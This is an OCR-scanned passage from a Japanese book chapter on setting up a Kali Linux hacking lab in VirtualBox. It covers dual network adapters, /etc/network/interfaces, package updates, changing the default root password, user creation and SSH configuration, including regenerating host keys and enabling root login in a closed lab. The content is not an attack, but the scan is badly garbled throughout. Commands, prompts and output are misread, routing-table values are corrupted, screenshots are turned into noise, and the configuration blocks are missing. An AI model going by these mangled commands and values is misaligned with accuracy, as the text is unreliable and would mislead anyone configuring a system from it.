上 記 で 触れ た | ホス ト オ ン リー ネッ トワ ー ク 」 タプ で の 設定 内 容 と 同じ に 
し ます 。 作成 アイ コン で "VirtualBox Host-Only Ethernet Adapter'" を 追加 し 
ます 。「#2] の よう に 番号 が 割り 振ら れる こと が あり ます が 、 気 に し な く て も 
問題 あり ませ ん 。 ア ダ プ ター を 追加 し た ら 、 プロ パテ ィ ア イコ ン を 押し て 、IP 
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アド レス や DHCP サ ー バ ー の 設定 を し ます 。 具体 的 な 値 に つい て は 上 記 と 同 
様 で す 。 最 後に 、DHCP サ ー バ ー の 有効 に チェ ッ ク を 入れ て 、[ 適 用 |] ボタ ン 
を 押し ます 。 


VirtualBox の メイ ン 画 面 の 左 ペ イン で 仮想 マシ ン を 選択 し た 状態 で 、 右 クリ ッ 
ク の 「 設 定 ] を 選び ます 。「 設 定 ] 画面 の 左 ペ イン か ら 、「 ネ ットワーク 」 を 選び 、 
ステ ッ プ ① の 内 容 を 設定 し ます 。 


3③LAN アダ プター の 接続 状態 を 確認 する 

Kalji の 仮想 マシ ン を 起動 し た ら 、 右 下 の ネ ットワーク アイ コン (2 つの 端末 の 
印 ) に マウ スポ イン タ を 当て ます 。 す る と 、 そ の 仮想 マシ ン の LAN ア ダ プ ター に 
対す る ケー ブル の 接続 状態 が 表示 され ます ( 図 2.53) C32)。 


アダ プター 1 (ホス ト オ ン リー アダ プター) 
ケー ブル : 涯 扶 


アダ プター 2 (NAT) 





図 2.53 アク ティ ブ な ネッ トワ ー ク デバ イス の 表示 


ケー ブル 切断 に な っ て いる アダ プター が あれ ば 、 右 クリ ッ ク し て 接続 状態 に 変 


一 ネッ トワ ー ク 設定 ..… 


ぜ ネッ トワ ー ク アダ ブタ ー を 接続 1 
ネッ トワ ー ク アダ ブタ ー を 接続 2 





図 2-54 全 ア ダ プ ター に 対し て ケー ブル 接続 状態 に する 


*32:O0S や ソフ トウ ェ ア 側 で ネッ トワ ー ク の 設定 を し て も 、 ケ ー プ ル が 物理 的 に アダ プター に 挿入 
され て いな けれ ば 通信 で きま せん 。 こ こ で は ケー プル の 抜き 差 し を 仮想 的 に 設定 で きる わけ で す 。 
例え ば 、 ケ ー プ ブル の 接続 断 に よる 異常 処理 の 試験 を 仮想 環境 で 確認 する に は 、 こ こ を 操作 し ます 。 





| 第 2 章 | 仮想 環境 に よる ハッ キン グ ・ ラ ボ の 橋 築 083 


4 Kali の ネッ トワ ー ク 状態 を 確認 する 

通常 で あれ ば 、 こ の 時 点 で ゲス ト OS で は 2 つの LAN ア ダ プ ター が 認識 され 、 さ 
ら に 両方 の LAN ア ダ プ ター か ら 通 信 が 可能 と な り ま す 。 し か し 、Kalii で は 、 も う 
少し 設定 が 必要 と な り ま す 。 

Kali を 起動 し て 、 右 上 の ネッ トワ ー ク 状態 を 見 る と 、 片 方 の LAN ア ダ プ ター の 
通信 が 切れ て いま す 。 さ ら に 、Network の 設定 を 確認 し て も 同様 で す 。 ifconfig コ 
マン ド で 確認 する と 、 片 方 に し か IP アド レス が 割り 振ら ちら れ て いま せん 。 つ まり 
片方 の ネッ トワ ー ク し か 利用 で き な い 状況 に な っ て いま す 。 

Po 
作 し て 接続 状態 に し ます 。 す る と 、 も う 片 方 の LAN ア ダブ プター の 接続 が 自動 的 に 
切れ て し まい ます (トグル スイ ッ チ も OFF に な る ) ( 図 2.55)。 つ まり 、 片 方 し か 
接続 で き な い よう な 動き に な り ま す ("33)。 


党 WiLHI 
A ゆ yanced Mro Devices [AMID] Ehermwt 
uctooth 
て commevted - 1O0 Mb な 5 
Bycewqround 
Intel Ethernct 
Not ま KahGores 
1000 KJ り 5s 
Seath 


RKeCh Large VPN 


⑩) Unersal Acess No set いや 


圭 ′ Oriime Accours 


馬 Privacy 


< さ Shieim 





図 2-.55 Kali 側 で の LAN アダ プター の 接続 状態 の 確認 


実は Debian 特有 の network-manager の 仕様 に より 、 こ うい っ た 動作 を し て し ま 
う の で す 。 


33 :LAN ア ダブ プター の 数 が 3 個 で も 同様 に 、1 個 し か 接続 され ませ ん 
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5⑤)LAN アダ プター の 設定 を 書き 込む 
この 問題 の 解決 方 法 は 、"/etc/network/interfaces'” ファ イル に LAN ア ダ プ ター 
の 設定 を 直接 書き 込ん で し まう こと で す (<*34)。 





/etc/network/interfaces (編集 前 ) 





デフ ォ ル ト で は 、lo (ルー プ バ ッ ク ア ドレ ス ) し か 設定 され て いま せん 。 そ こ 
で 、 こ の 後ろ に 次 の 内 容 を 追記 し ます 。 こ こ で は LAN ア ダ プ ター の 数 が 2 個 ( イ 
ンタ ー フ ェ ー ス 名 が eth0 と eth1) な の で 、2 つ 分 の 設定 に な っ て いま す 。 





/etc/network/interfaces (追加 内 容 ) 





"34 : vi の 控 作 に 関し て は 、 巻 末 付 録 の 「vi の 採 作 ] を 参照 し て くだ さい 。 編 集中 に 反 作 が わか ら 
な く な っ た 場合 に は 、[ESC] キー を 押し て |:qll を 入力 し ます 。 こ れ で 保存 せ ず に 終了 で きま す 。 
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6 Kali の ネッ トワ ー ク 状態 を 再度 確認 する 

Kali を 再起 動 し ます 。 そ の 後 、Kalli に て ネッ トワ リー ク の 接続 状態 を 確認 し ます 。 
する と 、 あ た か も 両方 の LAN ア ダ プ ター が 接続 断 の 状態 に 見 えま す 。 特に 、 
Network の 設定 画面 は 先ほど と 大 きく 異な っ て いて 、LAN ア ダブ プター が 選べ な く 


な っ て いま す ( 図 2-56)。 


WA-FI 

RuctooWh VPN 

Bacikqioumd NOi set up 
NotiicdIOr'S 

2 Network Prowy 
Rcgon & Loun が た 
Unevyersal Access 
Onlne Accournts 


Fri 『 


Sharirg 


* ロ NRNctwvrk 





2-56 設定 後 の LAN ア ダ プ ター の 接続 状態 の 確認 


し か し 、 内 部 的 に は うま くい っ て いま す 。 iifconfig コマンド を 実行 する と 、eth0O 
と ethl の どちら に も IP アド レス が 割 り 振 られ て いま す 。 


で Kalii に 2 つの LAN アタ プター を 設定 する ぐ 静 的 IP アド レス 編 > 
2 つの LAN ア ダ プ ター を 設定 し 、 そ れ ぞ れ に 動 的 IP アド レス を 割り 当て られ ま 


し た 。 こ こ で は ホス ト オ ン リー アダ プター 側 を 静 的 IP アド レス に 変更 し ます 


1) ホ スト オン リー アタ フタ ー 側 を 静 的 IP アド レス に 変更 する 


etc/network/interfaces” ファ イル を 編集 し ます 。 
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"/etc/network/interfaces" ファ イル (編集 前 ) 








"/etc/network/interfaces" ファ イル (編集 後 ) 








ここ で 、eth0 で は gateway を 指定 し て いま せん 。 なぜなら 、eth1l が DHCP で 動 
的 に IP アド レス を 割り 振ら れ た と き に 、 自 動 で デフ ォ ル トゲ ダ ゲートウェイ ま で 設定 
され て し まう か ら で す 。 eth0 で も gateway を 指定 する と 、 ル ー テ ィング テー ブル 
に デフ ォ ル トゲ ー ト ウェ イ の レコ ー ド が 2 行 現れ て し まい 、 通 信 に 支障 を きた す 
こと が あり ます C で 35)。 


*35: どう し て も 両方 の LAN ア ダ プ ター の IP アド レス を DHCP で 割り 当て た い 場 合 に は 、 問 題 を 
引き 起こ す レ コー ド を 自動 的 に 削除 する 仕組 み を 導入 し ます 。 
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2 IP アド レス が 適切 に 割り 振ら れ て いる か 確認 する 
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rootMKa11:<# route 
Kernel IP routing table 


Destination Gateway Genmask Flags Metric Ref Use TIface 
default _gateway 9.9.9.9 UG 9 9 9 eth1 
19.9.9.9 9.9.9.9 255:255。255 の | 9 9 9 eth9 
19.9.3.9 9.9.9.9 255.255.255.9 U 9 9 9 eth1 


④) 各 ネッ トワ ー ク に アク セス で きる こと を 確認 する 
Ping で 各 ネ ットワーク に アク セス で きる こと を 確認 し ます 。 





root 仙 ka11:<# ping 192.168.1.1 物理 ネッ トワ ー ク の ルー ター に アク セス 。 


roo 人 kal1:< Ding akademeia. info イン ター ネッ ト に アク セス 。 
Poot 佑 ka11:< 井 Ding 19.9.9.1 ホス ト オ ン リー ネッ トワ ー ク の ホス ト oSs に アク セス 。 





どう し て も ネッ トワ ー ク に 接続 で き な い 場合 


仮想 LAN ア ダ プ ター を 2 つつ 設定 し た 際 に どう し て も ネッ トワ ー ク に 接続 され な 
い 場 合 に は 、1 つ だ け に 限定 し て 使用 し て くだ さい 。 特 に 、 | 複数 の 仮想 LAN アダ 
プター」 や |「 プ リッ ジア ダ プ ター の 指定 ] と いう 状況 で 通信 が うま くい か な いこ 
と が あり ます 。 設定 の 問題 で あれ ば 解決 策 は あり ます が 、VirtualBox や ドラ イ 
バー の 問題 だ っ た 場合 は 対応 が 困難 で す 。 環境 構築 に こだわ り 続 け て 、 本 来 の 目 
的 で ある ハッ キン グ を 練習 で き な い の で は 意味 が あり ませ ん 。 

仮想 LAN ア ダ プ ター が 1 つ で あっ て も 、 本 書 の ほとん どの 実験 は 可能 と な っ て 
いま す 。 ハッキング の 練習 で は ホス ト オ ン リー アダ プター に 切り 替え 、 イ ンタ ー 
ネッ ト ア クセ モス で は NAT に 切り 替え ます 。 そ の 都度 、"/etc/network/interfaces' 
ファ イル の 内 容 を 見 直し て くだ さい 。 
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光 パッ ケー ジ の アッ プ デ ー ト 


これ まで の ネッ トワ ー ク の 設定 で イン ター ネッ ト に 接続 で きる も の と し ます 
(*36)。Kalii の イン スト ー ル 直後 、 そ の 後 は 定期 的 (1 カ月 に 1 回 ほど ) に 、 パ ッ 
ケー ジ 情 報 や イン スト ー ル 済み の アプ リ を 更新 し ます 。 こ の 処理 に は 時 間 が か か 
る の で 、 手 が 空い て いる 間 に 実 行 し て お く こ と を お すす めし ます 。 


(① イ ンタ ーネット に 接続 で きる こと を 確認 する 
Terminal を 起動 し て 、Ping で イン ター ネッ ト に 接続 で きる こと を 確認 し ます 。 





(2② パッ ケー ジ の リス ト を 更新 する 
パッ ケー ジ の リス ト を 更新 し ます 。 こ れ を し て お か な いと 、 ア プリ の イン ス 
トー ル が うま くい か な い 場 合 が あり ます 。 





ある い は 、 





ちな み に 、apt-get コ マン ド を 紹介 され が ち で す が 、 現 在 は apt の 使用 が 推 装 さ 
れ て いま す 。 


(3⑬③ パッケージ を 更新 する 
パッ ケー ジ を 更新 し ます 。 こ れ に より 、 イ ンス トー ル 済 み の ア プリ が 最新 に な 


*36 : NAT で 外部 に アク セス で きる よう に な っ て いる は ず で す 。 
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り ま す C37)。 


ある い は 、 








訪 root の パス ワー ド を 変更 する 


root ユ ー ザ ー の 初期 パス ワー ド は "toor" で す 。 自宅 の LAN 内 で 使用 し て いる 場 
合 に は 問題 あり ませ ん が 、 外 部 の LAN に 接続 し た と き に 不正 に アク セス され る 世 
れ が あり ます 。 

root ユ ー ザ ー で passwd コマ ンド を 引数 な し で 実行 する と 、 root ユ ー ザ ー の パス 
ワー ド を 変更 で きま す 。 


区 ユー ザー を 追加 する 

デフ ォ ル ト で は root ユ ー ザ ー し か 存在 し ませ ん 。 ユー ザー を 追加 する 場合 に は 、 
次 の よう に useradd コ マン ド を 実行 し ます 。-m オ プシ ョ ン で 新規 ユー ザー と その 
ホー ム デ ィ レ クト リ ("home/< ユ ー ザ ー 名 >") が 作成 され ます 。 


*37 : 各種 ソフ ト の 設定 を 求め られ る こと が あり ます 。 そ の 内 容 に つい て わか ら な い 場 合 に は 、 デ 
フォ ルト の 【No] を 選択 し て 続行 し て くだ さい 。 ま た 、GRUB の 設定 で プー ト デバ イス を 聞か れ 
る こと が あり ます 。 そ の 際 は 、 1 台 の HDD で 構成 され た 仮想 マシ ン で ある た め 、 "/dev/sda" を 選 
び ま す 。[ 1 ] キー や ヤ や [1] キー で "/dev/sda/" に カー ソル を 移動 し て 、[Space] キー を 押し て 
選択 し ます (アス タリ スク が 付く )。[Tab] キー で [OK] ボタ ン の 位置 に 移動 し て 、[Enter] 
キー を 押し ます 。 











| 第 2 章 | 仮想 環境 に よる ハッ キン グ ・ ラ ボ の 構築 091 


さら に 、passwd コマ ンド を 実行 し て 、 そ の ユー ザー の パス ワー ド を 設定 し ます 。 
root@ka11:<# passwd < ユー ザー 名 > 

sudo コ マン ド を 使用 する 権限 を 号 え る の で あれ ば 、 次 の コマ ンド も 実行 し ます 。 
root@ka11 :<# usermod -a -G sudo < ユー ザー 名 > 


さら に 、 ロ グイ ン シ ェ ル を bash に 設定 する の で あれ ば 、 次 の コマ ンド を 実行 し 
ます 。 


FootQka1i:<# chsh -s /bin/bash < ユー ザー 名 > 


SSH の 環境 を 構築 する 


SSH (Secure Shell) と は 、 セ キュ ア な 通信 で り リモ ー ト アク セス する た だ ため の プ ロ 
トコ ル で す 。 従来 は リモ ー ト アク セス に telInet が 用 いら れ て いま し た が 、 通信 内 容 
が 平文 で 流れ て し まう た め 、 パ ケッ トキ ャ プチ ャ (ネッ トワ ー ク 盗聴 ) で 秘 客 情 
報 が 漏れ や すく 、 改 ざん も され や すい と いう 問題 が あり まし た 。 SSH で は 、 こ う 
し た 問題 を 解決 する た め に 、 強 固 な 認証 と 暗号 化 の 機能 が 追加 され て いま す 。 

Kali の 場合 、 デ フォ ルト で SSH ア クセ ス が で きま せん 。 SSH サ ービス を 提供 す 
る sshd (SSH の サー ビス プロ グラ ム ) が 無効 に な っ て いる た めで す 。 

SSH アク セス を 実現 する に は 、 接 続き され る 側 (ここ で は Kali) で sshd を 起動 し 、 
接続 する 側 (ここ で は ホス ト OS で ある Windows 10) に SSH ク ライ アン ト を 用 意 
し な けれ ば な り ま せん 。 

な お 、SSH の 環境 構築 は 必須 事項 で は あり ませ ん 。 本書 で は 、 基 本 的 に ホス ト 
OS 上 で Kali の 仮想 マシ ン を 起動 し て GUI で 操作 する た めで す 。 し か し 、 次 の よう 
な 特殊 な 状況 で は 必要 と な り ま す 。 


・ Kali の 仮想 マシ ン を ヘッ ドレ ス 起 動 し て 運用 する 場合 
* Kali の 仮想 マシ ン を プリ ッ ジ 接続 で LAN に 接続 し 、 他 の 端末 か ら リ モー ト ア ク 
セス する 場合 
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s Raspberry Pi に Kalii を イン スト ー ル し て 、 他 の 端末 か ら リ モー ト ア クセ ス す る 
場合 


人 代表 的 な SSH クラ イア ント 


Windows の 環境 が ある 程度 整っ て いれ ば 、 す で に SSH ク ライ アン ト が イン ス 
トー ル さ れ て いる か も し れ ま せん 。 例え ば 、Git Bash (38) が イン スト ー ル され て 
いれ ば 、ssh コ マン ド を 使え ます 。 ま た 、Windows 10 で は 、WSL (Windows 
Subsystem for Linux) (*39) を 使え る の で 、 設定 次 第 で は Ubuntu の bash を 使え ま 
す 。 ま た 、OpenSSH を PowerShell に 追加 する モジ ュー ル も 存在 し ます ("40)。 し 
か し 、 い ずれ も CUI の SSH ク ライ アン ト な の で 、 こ こ で は 代表 的 な GUI の SSH ク 
ライ アン ト を 紹介 し ます 。 


Tera Term (https://ja.0sdn.net/projects/ttssh2/) 


・ 歴史 の ある SSH ク ライ アン ト 。 
・ シリ アル 接続 可能 。 
・ 疑似 的 に タブ 化 で きる (デフ ォ ル ト で は イン スト ー ル され て いな い )。 


PuTTY (http://www.chiark.greenend.org.uk/~sgtatham/putty/) 


* 書籍 で よく 取り 上 げ ら れる SSH ク ライ アン ト 。 

・ オリ ジ ナ ル バ ー ジ ョ ン は 日 本 語 に 対応 し て いな い の で 、 日 本 語 表 示 を 可能 し た バー ジョ ン が 開 
発 さ れ て いる 。 例 えば 、PuTTY-ranvis (http://Www.ranVis.com/putty) な ど が ある 。 

・ Tera Term よ り も 軽い 。 

雪 自動 ログ 取得 が 容易 。 


Poderosa (https://ja.poderosa-terminal.com/) 


・ 見 た 目 が Windows アプ リ と し て 洗練 され て いる 。 

*.NET アプ リ で ある た め 、 若 干 重く 感じ られ る 。 ま た 、.NET を イン スト ー ル する 必要 が ある 。 
5 タブ 機能 、 画面 分 割 機能 が ある 。 

自動 ログ 取得 が 可能 。 





*38 : Git for Windows に 付属 し て いる Bash の こと で す 。 詳細 は 3.16 の コラ ム を 参照 し て 下さ い 。 
*39 : Linux 向 け の プロ グラ ム を 実行 で きる よう に な る 機能 の こと で す 。 


*40 : Microsoft 公式 の PowerShel リポ ジ ト リ に て 公開 され て いま す 。 
https//gthub.com/PowerShelL/ Win32-0penSSH/releases 
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Remote Desktop Manager (https://remotedesktopmanager.Com/) 


* SSH だ け で な く 、 リ モー ト デ ス クト ッ プ 、VNC、VPN、 ク ラウ ド (AWS、Azure)、 仮 想 環境 
(VirtualBox、VMWare、Hyper-V) な どの 様々 な サー ビス に 対応 し て いる (こう いっ た タイ プ 
の アプ リ を 複合 型 ツ ー ル ある い は リモ ー ト 管理 ツー ル と 呼ぶ )。 

久 フリ ー 版 も ある 。 

・ 1 つの 画面 で 複数 の 接続 先 を 一 元 管理 で きる 。 

。 グルー プ 化 し て 一 斉 に 接続 で きる 。 


・ 一 般 に 単体 の クラ イア ント と 比べ て 、 動 作 が 重い 。 


Royal TS (https://www.royalapplications.Ccom/ts/win/features) 


・ 複合 型 。 
・ Remote Desktop Manager と ほぼ 同等 の 機能 を 持つ 。 


ここ で 紹介 し た も の 以外 に も た くさ ん 存在 し ます 。 本書 で は 最初 に 取り 上 げた 
Tera Term で 解説 し ます 。 他 の SSH ク ライ アン ト で も 同様 の こと を 実現 で きる の 
で 、 好 み の も の で 問題 あり ませ ん 。 





@ Kali に SSH で パス ワー ド 接 続 する 


接続 され る 側 で ある Kalii に お いて SSH の 設定 を 適用 し ます 。 そ の 際 、 次 の よう 
な 条件 で 設定 する も の と し ます 。 


* root 以 外 の ユー ザー を 作成 し て お き 、 その ユー ザー で ログ イン で きる よう に する 。 

sroot の デフ ォ ル ト パ ス ワー ド が toor で ある こと は 周知 きれ て いる の で 、 万 が 
ー ゲ スト ユー ザー で 侵 人 され て し まう と 、 そ の まま root 権 限 も 大 わ れ た こと に 
な っ て し まう 。 これ を 防ぐ た め に 、root の パス ワー ド を 変更 し て お く 。 

* ホ スト オン リー ネッ トワ ー ク を 通じ て 、 ホ スト OS か ら Kali に 接続 で きる 。 そ の 
と き ア クセ ス し や すい よう に 、 静 的 IP アド レス と する 。 


Kali の SSH の 設定 は 、 次 の 通り で す 。 


①SSH ホス ト 鍵 を 再生 成す る 
Kalii に は SSH サ ー バ ー が 組み 込ま れ て お り 、SSH ホ スト 鍵 も あら か じ め 生 成 さ 
れ て いま す 。 これら の 鍵 は デフ ォ ル ト の も の で あり 、 既 知 の 値 と いえ ます (⑫41)。 


41 : ova フ ァイル で イン ボー ト し た 仮想 マシ ン は 、 こ うし た 点 も 注意 する 必要 が あり ます 。 
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婦 は 公開 鍵 と 秘密 鍵 の ペア で あり 、 秒 密 鍵 が 既知 で は 問題 で す 。 そ こ で 、SSH ホ 
スト 鍵 を 再生 成 し て お きま す 。 
過去 の SSH ホ スト 鍵 を バッ クア ッ プ し て か ら 、SSH ホ スト 鍵 を 再生 成 し ま す 。 


Poo て 個 ka11:<# cd /etc/ssh 

rootQkal11 : / etc/ssh# mkdir default keys バッ クア ッ プ 用 ディ レク トリ を 作る 。 
root@ka11 : /etc/ssh# mv ssh host * defau]t keys/ 
root@ka1i : /etc/ssh# dpkg-reconfigure openssh-server 
Creating SSH2 RSA key: this may take some time ... 

2948 SHA256 : FqvOMutVrTq1dwYgaHgbkOhHN17RzCPE035TKSRF8us .」 
rootQka11 (RSA ) 

Creating SSH2 ECDSA key: this may take some time ... 

256 SHA256 : pPtnnR39TcDB91zN3G/Kt6Mg9pf93N1JPy8rUVuT91NM 
Foo て 引 ka11 (ECDSA ) 

Creatng SSH2 ED25519 key: this may take some tme -. 

256 SHA256 : 5NOATH+xR1ifTVc16uDmLDUoLYiq+JXLqk6BGRBZOTXw9 .」 
rootQka11 (ED25519 ) 





生成 し た 鍵 と デフ ォ ル ト の 代 の MD5 の ハッ シュ 値 を 比較 し て 、 確 か に 別 の も の 
に な っ た こと を 確認 で きま す 。 


rootQka11 : / etc/ssh# md5sum ssh_host * 
Poot@⑳ka1 ュ 1 : /etc/ssh# md5sum ./default keys/ssh_host * 


②)sshd が 起動 し て いる か を 確認 する 


sshd が 起動 し て いる か を 確認 し ます 。 


root@ka11:<# netstat -antp | grep ssh 


何 も 出 力 さ れ な いと いう こと は 、sshd が 起動 し て いま せん 。 
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3)sshd を 起動 する 
sshd を 起動 し ます 。 





これ だ け だ と 再起 動 し た と き に sshd が 起動 し な い の で 、 ブ ー ト 時 も 起動 する よ 
う 紅 し ます 。 





ブー ト 時 に 起動 する こと を 確認 する た め に 、sysv-rcconf を イン スト ー ル し ま 
す 。chkconfig の イン ター フェ ー ス に 合わ せ て 設計 され て いる の で 、 使 い 勝 手 が よ 
く 似 て お り 、 扱 いや すい と いえ ます 。 





ラン レベ ル と は 、Linux の 動作 モー ド の こと で あり 、0~-6 の 7 種類 が あり ます 。 
値 に よっ て 動作 の 内 容 が 異な り ま す 。 コ マン ド の 結果 を 確認 する と 、 ssh は ラン レ 
ベル 2、3、4、5 で 自動 起動 する こと が わか り ま す 。3 は CUI ロ グイ ン 、5 は GUI ロ 
グイ ン の と き を 意味 し ます 。Kali は 通常 GUI で ログ イン 画面 が 表示 され る の で 、 
ラン レベ ル 5 が 適用 され て いま す 。 よ っ て 、 プ ブー ト 時 に sshd が 起動 し ます 。 


④ ロ ー カ ル か ら SSH で ログ イン で きる こと を 確認 する 

ロー カル か ら 、 す な わ ち Kali の Terminal か ら 、ssh コ マン ド で ログ イン を 試み 
ます 。 ここ で は jpusiron ユ ー ザ ー で ログ イン し て いま す 。 自身 の 環境 の ユー ザー 名 
に 置き 換え て くだ さい 。 
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Pootka11:< 芋 ssh 1pus1ron 仙 1oca1host 
The authent ュ cty of host "localhost (::1)′ can't be estab1ished . 
ECDSA key fingerprint is SHA256 : xbC398Z1T1im/eE4yb+GmdHvJt14/」 


BpL1o5G]4yw0]GO . ーー 
Are you Sure you want to contnue connectng (yes/no)? yes 


Marning: Permanent1y added '1oca1host' (ECDSA) to the 1ist of 。」 
known hosts . 


1DuS1FPOnQ1ocalhost's password: ipusiron の パス ワー ド を 入力 する 。 


Linux ka]i 4.15.9-ka1]i2-amd64 #1 SMP Debian 4.15.11-1ka1i1 。」 
(2918-93-21) x86_64 


The programs 1ncluded with the Ka1i GNU/Linux system are free 
SO†tware : 

the exact distribution terms for each program are described in .」 
the 

1ndividual 和 † ュ iles 1n /usr/share/doc/*/copyright . 


Ka11 GNU/Linux comes with ABSOLUTELY NO MARRANTY, to the extent 
perm1tted by applicable 1aw. 


ipusiron@ka]i : <$ 
ipus1ronQka11 :<$ ex 

1ogout 

Connection to localhost closed . 

Poo て 個 ka11 : >## 


5) リ モー ト か ら SSH で アク セス で きる こと を 確認 する 
リモ ー ト か ら ssh サ ー バ ー に 接続 し て み ま す 。 こ こ で は ホス ト OS の コマ ンド プ 
ロン プ ト を 起動 し て 、Ping で 疎通 を 確認 し ます 。 


>ping <Kali の TP アド レス > 


問題 が な けれ ば 、SSH で アク セス で きる こと を 確認 し ます 。 
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Tera Term の 画面 
ヒス トリ に チ 
る の で 便利 で す 。 


閥 TCP/IP 


導 マ jj ア IE IE) 
<。 7 ルル 1E, 


ok | 店 マン モル 


図 2-58 接続 先 を 指定 する 


指定 ホス ト に 初め て 接続 し た 際 
に は 、 セ キュ リティ 玖 告 ダ イア ログ 
が 表示 され ます 。 接続 先 は 自分 の 
Kalii マ シン で あり 、 信 頼 で きる ホス 
ト な の で 、[「 こ の ホス ト を known 
hosts リ スト に 追加 する 」 に チェ ッ 
ク を 入れ だ まま 、[ 続 行 ] ボタ ン を 
押し ます ( 図 2.59) 。 

SSH 認証 画面 が 表示 さ 
ユー ザー 名 と パス フレ - 
は パス ワリ ワード) を 入力 し ます 。 
レイ ン パ スフレ ー ズ を 使う | に 


チェ ッ ク を 人 人 れれ た まま 、IOKI ボタ 


れる の で 、 


42: 接続 RE アド レス に 置き 換え て くだ 


を 指定 


J00.2 」 
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に て 、TCP/IP の ホス 
ッ ク を 人 れ だ た まま に - 
サー ビス に は SSH を 選び 、[OK] 


ー- 一 ト () 
ずい バト ま 
アデ! て! 


ト に 


ュ - プ 
9 の 


et 


Kali の IP アド レ 
と 、 プ ブル ダウ 


人 ーー 生 きこ 得 床 





192 TDS 1 52 


カビ ヒス ト UKO) 


TCP ポー ト 工 上 22 


SSH ら で や 


で の 他 ゴロ トコ jc 


ヘル プ (H) 





ki ncets リ スト 5S.152 の エン トリ | とし 。 
和合 た ポス ト が 反 偽 し よう と し て いる の 者 そい 


差 韻 才 和幸 っ た 


ホス 
可能 も 隔 ま す < 


kmzwn hrsis リ スト の この ホス ト ま j 師 加 し て 府 行 二 る 


HH バ パー ジョ ベツ ]- ISSHB =」 


ビ ) | NSPEC 。< 


ー バ " 192.158 
の で 十 誠人 禄 し て だ きい 


ど ) 知 my うー の 


等 言 は 出 く な りり ます 


サー バ ( 還 の ホス ト 硬 衣 硫 


組 役 1- コメ ゾ ュ 7 


アル ゴリ ズム : IMD5 SHa25S 








SHA255>bC99WZilpm/cE ypyGmdHy JM む /BpL jo5BywOGO 





ォ ーー- [ ECDS』 


256]- 一 + 


Il こ 届 本 スト 者 nymm hos リコ スト に 迫 加 すそ (A」 


統計 |(C) 


担 紅 WD) 





図 2.59 セキ ュ リ ティ 蓋 告 ダイ アロ グ 


っ 
か * … し 


y 財 ! 


本 書 の 構成 で あれ ば 、 ホ ス 


ト US か ら は 
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ン を 押し ます ( 図 260) 
5) 


{に ログ イン で きれ ば 、 プ ロ 


FNWI 


ーー wc ee w 内 
に 和 る 2 電 LSITO 
kk き : > IDUSiTOI SU 


ュー ザー で ログ イン し て いる の SE 
上 エ ー ジ ェ ン > ント 紙 竣 す 0D) 

で 、root 権 限 に 切り 槍 ん た けれ ば @ ブレ イン リス ワー ド ま 合う (U 

su コマ ンド を 用 いよ す | - [ を 指 | RSMDSECDSMED255 GE を 訂 う 

定 し て いる の は 、root の ホー ム 

ディ レク トリ に 自動 で 移動 させ る 


だ めで す ( 図 2261) ("43)。 F ャ レン ジレ スポ ソス 訪 証 ほ キー ボー ドイ ンタ ラッ ティ ブ XC) 


EE ip) 。| 





図 2-60 SSH 認 証 画面 


話 192.168.1.52 - rootkali: > 
ファ イル (F) 編集 (E) 設定 (GS) コン トロ ー ル (O) ウィ ンド ウ (W] ヘル プ (H) 
inuk kali 4.15.0-ka1i2-amcb4 1 SMP Debian 4.15.11-1kali1 (2018-03-21」 


Ihe programs included wih the Kali GNULinux systsm ars Tree software: 
the exact distribution terms Tor each program are described in 3 
Indiyidual filss in /usr/Sha re/doc/* ネ /copyrigFt . 


Kali (ULinux comes wth 由 SOLUIELY MD WWRRANIT。 to ths extsnt 

1 by applicable |aw. 

LS fla ト | Jun 6 U6:29:18 2018 from 19Z.168. 

SKI - 

PS の 

1 / わ 目 か に 1lS / 

U Init rd. img 1 “ le 還 : vmlinz 

alhdre 問 1: 導 ss Ya zelre 


uid- い (oo 。 IdEU( root) grcups=U( root〕 





図 2.61 SSH に ログ イン 後に root に 切り 替え た と ころ 


の の の の" こ チ ょ が 1 ーー す 々 出 1 - 上 | 4 |! - ど ーー さき ャ プ よそ ぞい * デデデ 』 デュ so =ー テ 1 マデ レー ニキ バリ ー 本 っ 
43 : /root ディ レク トリ に 移動 すれ ば ぱ ば 、 こ こ に し か パス が 通っ て いな い コ マン ド を すぐ に 使え 
十 -』 レコ - ロ ) デー 3 な と jmh 革 ラ ナ 、- よ と 胡 | / ア )・ 3 ば リーナ 。 bua 子 シュ ュ さ 叶 
ます 。 lsu -」 と 入力 し て ユー ザー を 切り 奪え た 方 が 、 対象 の エ ユー ザー に な りき れる と いえ ます 
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僅 SSH で root ロ グイ ン を 許可 する 
sshd を 起動 し た ら 、root で 直接 ログ イン で きる か を 確か め て み ま す 。 


Poot 個 kal1:<# ssh root 條 1oca1hos も ョ ワル 2 すーっ だ た 
Foot 人 1oca1host's password: リリ ムシ た コマ エタ も /k 


Perm1ss1on denied, please try agann. と (の 
( 略 ) 
Foot 由 1ocalhost's password: root の パス ワー ド を 入力 する 。 


Poot 條 1oca1host: Permission denied (pub11ickey , password) . と "(の / 








どう や ら root で は 直接 ログ イン で き な い よう で す 。 実は sshd の 設定 ファ イル 
で 、root の ログ イン が で き な い よう に 設定 され て いる の で す 。 

これ は セ モ セキュリ ティ を 向上 する た めで す が 、 root ユ ー ザ ー に 切り 准 え る の が 面 
国 と いう 場面 も ある で し ょ う 。 特に 、 閉 じ た 環 境 で あれ ば 、 外 部 か ら SSH に 攻撃 
され る 恐れ は 少な い の で 、 root ユ ー ザ ー で の ログ イン を 許可 し て も 問題 な いと い 
えま す 。 

そこ で 、SSH に て root で 直接 ログ イン で きる 方 法 を 紹介 し ます 。 た だ し 、 閉 じ 
た 環境 以外 に 接続 し て し まう こと も 想定 し て 、 万 が 一 の た め に root の パス ワー ド 
は toor か ら 別 の パス ワー ド に 変更 し て お いて くだ さい 。 


1) root で 直接 ログ イン で きる よう 設定 する 
/etc/ssh/sshd_config ファ イル を 編集 し ます ( 図 262) ("44) 。 


Foot 個 ka11:<# nano /etc/ssh/sshd config 


"/etc/ssh/sshd config" ファ イル (編集 前 ) 


Perm1tRootLogin prohib ュ it-password 


*44 : nano の 探 作 に 関し て は 、 巻 末 付 録 の [nano の 操作 ] を 参照 し て くだ さい 。/etc/ssh/ssh_ 
config ファ イル で は な く 、"/etc/ssh/sshd config ファ イル で ある こと に 注意 し て くだ さい 。 
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"/etc/ssh/sshd config" ファ イル (編集 後 ) 


Perm1tRootLog1n yes 


rOOtQ kali: < 
GNU nano 2.9.5 /etc/Ssh/Sshd COnf1q Mod1fied 


PermitRootLoqgin yes 較 





^O 還 コ 林 穫 うり Write Out 間 !| Where Ts 曽 Cut Text 四則 Just ュ イッ Cdiig 雪 ト 
